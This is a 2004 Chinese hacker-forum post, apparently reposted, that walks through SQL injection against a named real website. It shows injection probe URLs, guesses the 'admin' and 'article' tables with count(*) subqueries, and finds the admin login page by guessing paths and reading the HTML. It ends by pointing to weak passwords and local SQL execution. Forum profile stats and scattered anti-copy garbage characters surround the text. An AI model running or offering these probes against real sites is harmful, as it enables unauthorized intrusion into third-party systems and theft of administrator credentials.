- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版
$ C1 ?7 _8 c$ ?' Q' U
& ^8 c5 ?2 G2 c* A$ I有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?9 J1 `5 i5 H$ r6 Q8 p
$ W3 H$ i3 l4 m+ H% v" { R
分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。
* ]" \8 m+ I9 G! A) r* u# e, k7 ]/ ], f2 Y/ b# t) \* L1 @0 H/ w
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。
4 z2 p5 W, @. y8 U: l
* ]& j- Y* H9 M$ |' k9 b# s这里我简单的介绍一个过程吧。, J$ N( h! {; ^9 ~
/ @0 \, u1 F X( L( ?" a% K首先我找到一个网站,是我们基地首页有连接的
6 i: h; ~1 q s: Q Nhttp://www.16china.com/hack/
, @3 ?; W+ d0 R- j4 W# y; |
( R9 f% ]0 X ?. ]) H随便选择一个分页:; w6 O# p2 B7 R; Q1 @4 C+ r1 o9 Q1 i
http://www.16china.com/hack/SoftView.Asp?SoftID=139
5 ?7 [: O9 H7 P/ U8 C/ d典型的ASP。看看能不能注射
9 e% }3 D" j# [" h4 }: ghttp://www.16china.com/hack/SoftView.Asp?SoftID=139'
- Q6 R6 G# B4 Z' l' H' L返回:
% P6 ?5 Z5 L% D7 oMicrosoft VBScript 编译器错误 错误 '800a03f6' 6 T) r: J; d6 C" H: P, A
$ U' w3 e' H: _
缺少 'End'
6 ]5 M* Z, H6 t, J' h+ @0 S9 z
1 L0 ]. L. u3 @ u- t7 a) M) ]; e& M/iisHelp/common/500-100.asp,行242 . G5 t; M9 g9 D+ h5 c: w( n
# G! D/ Q% P4 R1 k/ v) S' V8 P- s( K
Microsoft JET Database Engine 错误 '80040e14' 8 \% ~% L, l5 H- l; q9 N# a! k
8 s3 |7 u3 B% h5 D
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 8 Q+ ~) R0 ~: E6 y
: [9 e* `$ i0 k
/hack/SoftView.Asp,行17
# {- b4 I9 g: g. ~再来:
0 Y [2 D5 [- bhttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
% ~" o) V: h3 c' D( G A6 M% J返回正常网页。
( z1 h/ [# F. m7 X7 x) j) J4 c' I! F, W. \9 @3 g( N3 C0 c
提交:$ F! \1 i! b- Z' M& N/ x
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0$ F5 O& ]( k d( [& L$ z
, m- T) Y- Q6 r- f' g返回正常页/5 D1 M' y8 C: ?: Z% z: h
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
. ~# K2 X$ g" O" x+ O N' n, [8 u p
同样正常。
" N6 y# U- |& I8 q: Q' B2 m8 n1 k; P) \$ [# H" c# \
http://www.16china.com/hack/Soft ... )%20from%20article)>=0
" H9 N( j* q1 x# E
7 X4 B: l* W( L0 ]; S……
! e) Z$ ~( _9 W# m
* ?, W4 K; O" @4 B: ~+ z7 C象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
( J7 x) k, g4 |! \7 ^) f: y按以往的经验我采用:2 R- C f" E" D2 s2 h+ H
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/$ `, X5 i3 B6 G+ v4 _
我为什么不用http://www.16china.com/hack/admin.asp
! s" m, \7 o, g' Ghttp://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。& Z0 A+ _ |9 Q6 ~
http://www.16china.com/hack/admin返回信息:+ C7 j- P. O" x, Q# Y: B$ t
错误提示信息! ( t, |# H% z2 B; T+ e
产生错误的可能原因:
7 W0 u' @- N) J+ S% {. P
4 l' u, ?& C8 }# ~( `, L" l% S+ ?3 w; K
您没有进入本页面的权限!本次操作已被记录!
# ?7 H' R; W9 F: e可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.8 w; M6 k0 P+ O A( O# I7 G
本页面为[管理员]专用,请先登陆后进入.
* }) L) P( @6 M( a4 R3 V
9 O1 ~ y6 R" ? [9 ]! C+ v返回上一页... /*说明登陆URL为常用的如:index.asp...*/# E/ A9 f) s% Q' j
查看HTML代码:8 K, ` S0 |) e" u
<html><head><title>错误提示信息!</title>0 k% ~* {4 P' R/ F$ S4 p
) E1 ?- l8 S3 ]1 ~8 S" m( {! u, x……9 D- d& z2 J) C R3 \
0 x+ k) a' s* G7 s0 z+ X
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.9 P5 B$ c1 t8 B& C2 e9 v( F3 h2 K B
……" D" i6 k+ Y- C" m& D
6 Z5 l* M( z; a$ c) m9 Y找到了:
# N9 d' M' O& zhttp://www.16china.com/hack/admin/adminlogin.asp% [$ \6 w' s! W% m0 I& ?
& [: I# _; }' K, h- J' m
" ]1 d7 A, K/ s) Y看看他的源代码告诉我们些什么:
9 b0 @3 h+ Y# n3 g7 P% o* A. s8 ^( G; m/ J; m% b6 L q
<html>
* z* j2 Z! V0 e0 b5 s9 T* a* g* n* S3 U4 g/ ]9 `) q
<head>
) Z' P/ C `2 s7 D3 q4 Z<title>管理员登陆</title>
' i4 V/ W i! @8 A" b3 ?8 ?2 }
5 Z8 V2 s- P. p$ Y) V% q……………
& y: J6 i8 L& P; t) M5 X% \/ E1 v$ Y# f& d% T8 y4 A
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
1 Q3 e; e3 z9 z( J' Phttp://www.16china.com/hack/admin/adminlogin.asp?action=login* z7 z9 X" v3 l
这里。
/ h0 e% q+ D) ^: s( A$ ~9 E
- |; n% M- j/ B7 O# c g; }只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……; a! C+ ?9 r& M/ F' S. n U" m4 A
# `, q% \8 G1 d% P懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
